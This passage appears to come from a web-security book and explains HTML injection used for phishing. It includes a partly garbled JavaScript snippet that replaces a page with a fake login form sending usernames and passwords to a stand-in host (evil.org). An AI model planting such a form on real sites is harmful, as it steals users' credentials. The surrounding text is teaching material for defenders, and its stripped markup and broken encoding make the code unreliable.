Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos
"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"
One of the common images suitable for print is Stall0wn3d. The HTML injection string for this attack could simply be this: . However, having control of the way a web application appears to a victimized user can be much more beneficial to an attacker than simply displaying some hot picture of Sylvester Stallone. An attacker could perform a phishing attack that coerces the user into giving the attacker confidential information. Using document.body.innerHTML, an attacker could present a login page that looks identical to the vulnerable web application??™s login page and that originates from the domain that has the HTML injection, but upon submission of the form, the data is sent to a site of the attacker??™s choosing. Thus, when the victimized user enters his or her username and password, the information is sent to the attacker. The code could be something like this: document.body.innerHTML="
Company Login
action=http://evil.org/grabPasswords method=get>
User name:
Passwordname=p>"; One simple trick with this code is that the form is sent over a GET request.